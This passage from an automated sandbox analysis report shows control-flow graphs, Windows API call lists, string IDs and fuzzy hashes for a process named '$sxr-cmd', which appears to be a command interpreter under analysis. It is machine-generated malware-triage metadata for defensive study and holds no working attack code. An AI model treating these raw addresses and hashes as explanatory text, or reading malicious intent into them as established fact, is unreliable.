                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                            • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                            • API String ID: 388421343-2905461000
                                                                                                            • Opcode ID: f6b3c8864cfcf0a5a2ea0a822c104307c370158276e02494081153d262952e71
                                                                                                            • Instruction ID: a0b3f9742eb934209e109a35df36554d01658bc43b2dfac460494c2e2e7210d4
                                                                                                            • Opcode Fuzzy Hash: f6b3c8864cfcf0a5a2ea0a822c104307c370158276e02494081153d262952e71
                                                                                                            • Instruction Fuzzy Hash: 7AF12E32A18E8286EBA0AB15E4847B9F7A4FB89760F804135D95D63B54DF3DE45CCB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 578 7ff7137f5554-7ff7137f55b9 call 7ff7137fa640 581 7ff7137f55bc-7ff7137f55e8 RegOpenKeyExW 578->581 582 7ff7137f55ee-7ff7137f5631 RegQueryValueExW 581->582 583 7ff7137f5887-7ff7137f588e 581->583 585 7ff7137ff248-7ff7137ff24d 582->585 586 7ff7137f5637-7ff7137f5675 RegQueryValueExW 582->586 583->581 584 7ff7137f5894-7ff7137f58db time srand call 7ff7137f8f80 583->584 590 7ff7137ff260-7ff7137ff265 585->590 591 7ff7137ff24f-7ff7137ff25b 585->591 587 7ff7137f568e-7ff7137f56cc RegQueryValueExW 586->587 588 7ff7137f5677-7ff7137f567c 586->588 594 7ff7137ff2b6-7ff7137ff2bb 587->594 595 7ff7137f56d2-7ff7137f5710 RegQueryValueExW 587->595 592 7ff7137f5682-7ff7137f5687 588->592 593 7ff7137ff28b-7ff7137ff290 588->593 590->586 597 7ff7137ff26b-7ff7137ff286 _wtol 590->597 591->586 592->587 593->587 600 7ff7137ff296-7ff7137ff2b1 _wtol 593->600 601 7ff7137ff2ce-7ff7137ff2d3 594->601 602 7ff7137ff2bd-7ff7137ff2c9 594->602 598 7ff7137f5712-7ff7137f5717 595->598 599 7ff7137f5729-7ff7137f5767 RegQueryValueExW 595->599 597->586 604 7ff7137f571d-7ff7137f5722 598->604 605 7ff7137ff2f9-7ff7137ff2fe 598->605 606 7ff7137f579f-7ff7137f57dd RegQueryValueExW 599->606 607 7ff7137f5769-7ff7137f576e 599->607 600->587 601->595 603 7ff7137ff2d9-7ff7137ff2f4 _wtol 601->603 602->595 603->595 604->599 605->599 608 7ff7137ff304-7ff7137ff31a wcstol 605->608 611 7ff7137f57e3-7ff7137f57e8 606->611 612 7ff7137ff3a9 606->612 609 7ff7137f5774-7ff7137f578f 607->609 610 7ff7137ff320-7ff7137ff325 607->610 608->610 615 7ff7137f5795-7ff7137f5799 609->615 616 7ff7137ff357-7ff7137ff35e 609->616 613 7ff7137ff34b 610->613 614 7ff7137ff327-7ff7137ff33f wcstol 610->614 617 7ff7137ff363-7ff7137ff368 611->617 618 7ff7137f57ee-7ff7137f5809 611->618 619 7ff7137ff3b5-7ff7137ff3b8 612->619 613->616 614->613 615->606 615->616 616->606 620 7ff7137ff38e 617->620 621 7ff7137ff36a-7ff7137ff382 wcstol 617->621 622 7ff7137f580f-7ff7137f5813 618->622 623 7ff7137ff39a-7ff7137ff39d 618->623 624 7ff7137ff3be-7ff7137ff3c5 619->624 625 7ff7137f582c 619->625 620->623 621->620 622->623 626 7ff7137f5819-7ff7137f5823 622->626 623->612 627 7ff7137f5832-7ff7137f5870 RegQueryValueExW 624->627 625->627 628 7ff7137ff3ca-7ff7137ff3d1 625->628 626->619 629 7ff7137f5829 626->629 630 7ff7137f5876-7ff7137f5882 RegCloseKey 627->630 631 7ff7137ff3dd-7ff7137ff3e2 627->631 628->631 629->625 630->583 632 7ff7137ff3e4-7ff7137ff412 ExpandEnvironmentStringsW 631->632 633 7ff7137ff433-7ff7137ff439 631->633 634 7ff7137ff414-7ff7137ff426 call 7ff7137f13e0 632->634 635 7ff7137ff428 632->635 633->630 636 7ff7137ff43f-7ff7137ff44c call 7ff7137eb900 633->636 639 7ff7137ff42e 634->639 635->639 636->630 639->633
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$CloseOpensrandtime
                                                                                                            • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                            • API String ID: 145004033-3846321370
                                                                                                            • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                            • Instruction ID: 6a5c554f00657b799540ee2442ef6b7b301015c101efa10fae6a8aedecfd4aa8
                                                                                                            • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                            • Instruction Fuzzy Hash: 47E1903252CE82C6E7D0AB10E48057AF7A4FB89764FC05136EA8E62A54DF7DD55CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 820 7ff7137f37d8-7ff7137f3887 GetCurrentThreadId OpenThread call 7ff7137f04f4 HeapSetInformation RegOpenKeyExW 823 7ff7137f388d-7ff7137f38eb call 7ff7137f5920 GetConsoleOutputCP GetCPInfo 820->823 824 7ff7137fe9f8-7ff7137fea3b RegQueryValueExW RegCloseKey 820->824 827 7ff7137fea41-7ff7137fea59 GetThreadLocale 823->827 828 7ff7137f38f1-7ff7137f3913 memset 823->828 824->827 829 7ff7137fea74-7ff7137fea77 827->829 830 7ff7137fea5b-7ff7137fea67 827->830 831 7ff7137feaa5 828->831 832 7ff7137f3919-7ff7137f3935 call 7ff7137f4d5c 828->832 833 7ff7137fea94-7ff7137fea96 829->833 834 7ff7137fea79-7ff7137fea7d 829->834 830->829 835 7ff7137feaa8-7ff7137feab4 831->835 841 7ff7137feae2-7ff7137feaff call 7ff7137e3240 call 7ff713808530 call 7ff7137f4c1c 832->841 842 7ff7137f393b-7ff7137f3942 832->842 833->831 834->833 837 7ff7137fea7f-7ff7137fea89 834->837 835->832 838 7ff7137feaba-7ff7137feac3 835->838 837->833 840 7ff7137feacb-7ff7137feace 838->840 843 7ff7137feac5-7ff7137feac9 840->843 844 7ff7137fead0-7ff7137feadb 840->844 852 7ff7137feb00-7ff7137feb0d 841->852 846 7ff7137feb27-7ff7137feb40 _setjmp 842->846 847 7ff7137f3948-7ff7137f3962 _setjmp 842->847 843->840 844->835 850 7ff7137feadd 844->850 848 7ff7137feb46-7ff7137feb49 846->848 849 7ff7137f39fe-7ff7137f3a05 call 7ff7137f4c1c 846->849 847->852 853 7ff7137f3968-7ff7137f396d 847->853 857 7ff7137feb66-7ff7137feb6f call 7ff7137f01b8 848->857 858 7ff7137feb4b-7ff7137feb65 call 7ff7137e3240 call 7ff713808530 call 7ff7137f4c1c 848->858 849->824 850->832 860 7ff7137feb15-7ff7137feb1f call 7ff7137f4c1c 852->860 854 7ff7137f396f 853->854 855 7ff7137f39b9-7ff7137f39bb 853->855 861 7ff7137f3972-7ff7137f397d 854->861 864 7ff7137f39c1-7ff7137f39c8 call 7ff7137f4c1c 855->864 865 7ff7137feb20 855->865 875 7ff7137feb71-7ff7137feb82 _setmode 857->875 876 7ff7137feb87-7ff7137feb89 call 7ff7137f86f0 857->876 858->857 860->865 870 7ff7137f397f-7ff7137f3984 861->870 871 7ff7137f39c9-7ff7137f39de call 7ff7137edf60 861->871 864->871 865->846 870->861 878 7ff7137f3986-7ff7137f39b3 call 7ff7137f0580 GetConsoleOutputCP GetCPInfo call 7ff7137f04f4 870->878 871->860 890 7ff7137f39e4-7ff7137f39e8 871->890 875->876 887 7ff7137feb8e-7ff7137febad call 7ff7137f58e4 call 7ff7137edf60 876->887 878->855 901 7ff7137febaf-7ff7137febb3 887->901 890->849 891 7ff7137f39ea-7ff7137f39ef call 7ff7137ebe00 890->891 898 7ff7137f39f4-7ff7137f39fc 891->898 898->870 901->849 902 7ff7137febb9-7ff7137fec24 call 7ff7137f58e4 GetConsoleOutputCP GetCPInfo call 7ff7137f04f4 call 7ff7137ebe00 call 7ff7137f0580 GetConsoleOutputCP GetCPInfo call 7ff7137f04f4 901->902 902->887
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                            • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                            • API String ID: 2624720099-1920437939
                                                                                                            • Opcode ID: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                            • Instruction ID: f69763bcbedc112f790e98e1ca38e1568881f311504be40cba1942731088cfac
                                                                                                            • Opcode Fuzzy Hash: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                            • Instruction Fuzzy Hash: BBC1BF31E08E428AF794BB6494805B8EAA4BF49734FD44539DA2E77B91DE3DA05CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1117 7ff7137f823c-7ff7137f829b FindFirstFileExW 1118 7ff7137f82cd-7ff7137f82df 1117->1118 1119 7ff7137f829d-7ff7137f82a9 GetLastError 1117->1119 1123 7ff7137f8365-7ff7137f837b FindNextFileW 1118->1123 1124 7ff7137f82e5-7ff7137f82ee 1118->1124 1120 7ff7137f82af 1119->1120 1121 7ff7137f82b1-7ff7137f82cb 1120->1121 1125 7ff7137f83d0-7ff7137f83e5 FindClose 1123->1125 1126 7ff7137f837d-7ff7137f8380 1123->1126 1127 7ff7137f82f1-7ff7137f82f4 1124->1127 1125->1127 1126->1118 1128 7ff7137f8386 1126->1128 1129 7ff7137f82f6-7ff7137f8300 1127->1129 1130 7ff7137f8329-7ff7137f832b 1127->1130 1128->1119 1131 7ff7137f8332-7ff7137f8353 GetProcessHeap HeapAlloc 1129->1131 1132 7ff7137f8302-7ff7137f830e 1129->1132 1130->1120 1133 7ff7137f832d 1130->1133 1136 7ff7137f8356-7ff7137f8363 1131->1136 1134 7ff7137f8310-7ff7137f8313 1132->1134 1135 7ff7137f838b-7ff7137f83c2 GetProcessHeap HeapReAlloc 1132->1135 1133->1119 1137 7ff7137f8315-7ff7137f8323 1134->1137 1138 7ff7137f8327 1134->1138 1139 7ff7138050f8-7ff71380511e GetLastError FindClose 1135->1139 1140 7ff7137f83c8-7ff7137f83ce 1135->1140 1136->1134 1137->1138 1138->1130 1139->1121 1140->1136
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 873889042-0
                                                                                                            • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                            • Instruction ID: 86c3f44d629c278989eb3e1a5c6f7c0cf1062894d9af382eeb606c98ce3730dc
                                                                                                            • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                            • Instruction Fuzzy Hash: 0F512C36A09F42DAEB80AB11E454579FBA4FB4DBA1F848531DA1E63750CF3DE4688730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1141 7ff7137f2978-7ff7137f29b6 1142 7ff7137f29b9-7ff7137f29c1 1141->1142 1142->1142 1143 7ff7137f29c3-7ff7137f29c5 1142->1143 1144 7ff7137fe441 1143->1144 1145 7ff7137f29cb-7ff7137f29cf 1143->1145 1146 7ff7137f29d2-7ff7137f29da 1145->1146 1147 7ff7137f2a1e-7ff7137f2a3e FindFirstFileW 1146->1147 1148 7ff7137f29dc-7ff7137f29e1 1146->1148 1149 7ff7137fe435-7ff7137fe439 1147->1149 1150 7ff7137f2a44-7ff7137f2a5c FindClose 1147->1150 1148->1147 1151 7ff7137f29e3-7ff7137f29eb 1148->1151 1149->1144 1152 7ff7137f2ae3-7ff7137f2ae5 1150->1152 1153 7ff7137f2a62-7ff7137f2a6e 1150->1153 1151->1146 1154 7ff7137f29ed-7ff7137f2a1c call 7ff7137f8f80 1151->1154 1156 7ff7137f2aeb-7ff7137f2b10 _wcsnicmp 1152->1156 1157 7ff7137fe3f7-7ff7137fe3ff 1152->1157 1155 7ff7137f2a70-7ff7137f2a78 1153->1155 1155->1155 1160 7ff7137f2a7a-7ff7137f2a8d 1155->1160 1156->1153 1161 7ff7137f2b16-7ff7137fe3f1 _wcsicmp 1156->1161 1160->1144 1162 7ff7137f2a93-7ff7137f2a97 1160->1162 1161->1153 1161->1157 1164 7ff7137fe404-7ff7137fe407 1162->1164 1165 7ff7137f2a9d-7ff7137f2ade memmove call 7ff7137f13e0 1162->1165 1166 7ff7137fe40b-7ff7137fe413 1164->1166 1165->1151 1166->1166 1168 7ff7137fe415-7ff7137fe42b memmove 1166->1168 1168->1149
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                            • Instruction ID: a0b4fc34ed0fd4b68d660b3cc40cccd2292ea5914748868690995560c0b57100
                                                                                                            • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                            • Instruction Fuzzy Hash: D051E765B08E8285EAA0AF15A58427AE694FB58BB0FC45234DE7E276D0DF3CE44DC610
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 642 7ff7137f4d5c-7ff7137f4e4b InitializeCriticalSection call 7ff7137f58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7137f0580 call 7ff7137f4a14 call 7ff7137f4ad0 call 7ff7137f5554 GetCommandLineW 653 7ff7137f4e4d-7ff7137f4e54 642->653 653->653 654 7ff7137f4e56-7ff7137f4e61 653->654 655 7ff7137f51cf-7ff7137f51e3 call 7ff7137e3278 call 7ff7137f4c1c 654->655 656 7ff7137f4e67-7ff7137f4e7b call 7ff7137f2e44 654->656 662 7ff7137f4e81-7ff7137f4ec3 GetCommandLineW call 7ff7137f13e0 call 7ff7137eca40 656->662 663 7ff7137f51ba-7ff7137f51ce call 7ff7137e3278 call 7ff7137f4c1c 656->663 662->663 673 7ff7137f4ec9-7ff7137f4ee8 call 7ff7137f417c call 7ff7137f2394 662->673 663->655 677 7ff7137f4eed-7ff7137f4ef5 673->677 677->677 678 7ff7137f4ef7-7ff7137f4f1f call 7ff7137eaa54 677->678 681 7ff7137f4f95-7ff7137f4fee GetConsoleOutputCP GetCPInfo call 7ff7137f51ec GetProcessHeap HeapAlloc 678->681 682 7ff7137f4f21-7ff7137f4f30 678->682 687 7ff7137f5012-7ff7137f5018 681->687 688 7ff7137f4ff0-7ff7137f5006 GetConsoleTitleW 681->688 682->681 684 7ff7137f4f32-7ff7137f4f39 682->684 684->681 686 7ff7137f4f3b-7ff7137f4f77 call 7ff7137e3278 GetWindowsDirectoryW 684->686 697 7ff7137f51b1-7ff7137f51b9 call 7ff7137f4c1c 686->697 698 7ff7137f4f7d-7ff7137f4f90 call 7ff7137f3c24 686->698 691 7ff7137f507a-7ff7137f507e 687->691 692 7ff7137f501a-7ff7137f5024 call 7ff7137f3578 687->692 688->687 690 7ff7137f5008-7ff7137f500f 688->690 690->687 694 7ff7137f5080-7ff7137f50b3 call 7ff71380b89c call 7ff7137e586c call 7ff7137e3240 call 7ff7137f3448 691->694 695 7ff7137f50eb-7ff7137f5161 GetModuleHandleW GetProcAddress * 3 691->695 692->691 708 7ff7137f5026-7ff7137f5030 692->708 723 7ff7137f50b5-7ff7137f50d0 call 7ff7137f3448 * 2 694->723 724 7ff7137f50d2-7ff7137f50d7 call 7ff7137e3278 694->724 700 7ff7137f5163-7ff7137f5167 695->700 701 7ff7137f516f 695->701 697->663 698->681 700->701 706 7ff7137f5169-7ff7137f516d 700->706 707 7ff7137f5172-7ff7137f51af ??_V@YAXPEAX@Z call 7ff7137f8f80 701->707 706->701 706->707 712 7ff7137f5075 call 7ff71380cff0 708->712 713 7ff7137f5032-7ff7137f5059 GetStdHandle GetConsoleScreenBufferInfo 708->713 712->691 716 7ff7137f505b-7ff7137f5067 713->716 717 7ff7137f5069-7ff7137f5073 713->717 716->691 717->691 717->712 727 7ff7137f50dc-7ff7137f50e6 GlobalFree 723->727 724->727 727->695
                                                                                                            APIs
                                                                                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4D9A
                                                                                                              • Part of subcall function 00007FF7137F58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71380C6DB), ref: 00007FF7137F58EF
                                                                                                            • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4DBB
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F4DCA
                                                                                                            • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4DE0
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F4DEE
                                                                                                            • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E04
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F0589
                                                                                                              • Part of subcall function 00007FF7137F0580: SetConsoleMode.KERNELBASE ref: 00007FF7137F059E
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F05AF
                                                                                                              • Part of subcall function 00007FF7137F0580: GetConsoleMode.KERNELBASE ref: 00007FF7137F05C5
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F05EF
                                                                                                              • Part of subcall function 00007FF7137F0580: GetConsoleMode.KERNELBASE ref: 00007FF7137F0605
                                                                                                              • Part of subcall function 00007FF7137F0580: _get_osfhandle.MSVCRT ref: 00007FF7137F0632
                                                                                                              • Part of subcall function 00007FF7137F0580: SetConsoleMode.KERNELBASE ref: 00007FF7137F0647
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A28
                                                                                                              • Part of subcall function 00007FF7137F4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A66
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A7D
                                                                                                              • Part of subcall function 00007FF7137F4A14: memmove.MSVCRT(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4A9A
                                                                                                              • Part of subcall function 00007FF7137F4A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF7137F49F1), ref: 00007FF7137F4AA2
                                                                                                              • Part of subcall function 00007FF7137F4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AD6
                                                                                                              • Part of subcall function 00007FF7137F4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E8798), ref: 00007FF7137F4AEF
                                                                                                              • Part of subcall function 00007FF7137F5554: RegOpenKeyExW.ADVAPI32(?,00000000,?,00000001,?,00007FF7137F4E35), ref: 00007FF7137F55DA
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5623
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5667
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F56BE
                                                                                                              • Part of subcall function 00007FF7137F5554: RegQueryValueExW.ADVAPI32 ref: 00007FF7137F5702
                                                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E35
                                                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4E81
                                                                                                            • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4F69
                                                                                                            • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4F95
                                                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FB0
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FC1
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FD8
                                                                                                            • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F4FF8
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F5037
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F504B
                                                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F50DF
                                                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F50F2
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F510F
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F5130
                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7137F514A
                                                                                                            • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7137F5175
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
